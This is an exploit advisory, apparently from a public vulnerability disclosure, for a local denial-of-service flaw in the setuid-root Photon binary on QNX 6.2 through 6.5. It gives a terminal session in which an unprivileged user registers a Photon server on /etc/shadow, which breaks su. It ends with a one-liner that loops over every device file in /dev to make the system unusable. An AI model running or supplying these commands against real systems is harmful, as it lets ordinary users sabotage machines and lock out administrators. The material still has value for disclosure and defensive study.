#
# QNX 6.x Photon denial of service vulnerability by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/Photon allows users to create new servers with
# arbitrary filenames registered with the -N parameter.
# Photon does not check whether files exist and/or the owner of the ile is the
# same as the user. Thus any user can create a new server with a filename such
# as /etc/shadow resulting in a denial of service attack.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
# QNX 6.3.0
# QNX 6.2.0
$ id
uid=100(user) gid=100
$ /usr/photon/bin/Photon -N /etc/shadow
$ su -
su error: Password and Shadow files on different devices
$ ps -edaf | grep Photon
100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow
$ kill -9 4524851
$ su -
password:
Sat Oct 26 13:22:38 2013 on /dev/ttyp1
Last login: Sat Oct 26 02:43:08 2013 on /dev/ttyp1
edit the file .profile if you want to change your environment.
To start the Photon windowing environment, type "ph".
# If you want to make the system unusable:
$ for x in $(ls /dev); do /usr/photon/bin/Photon -N "/dev/$x"; done
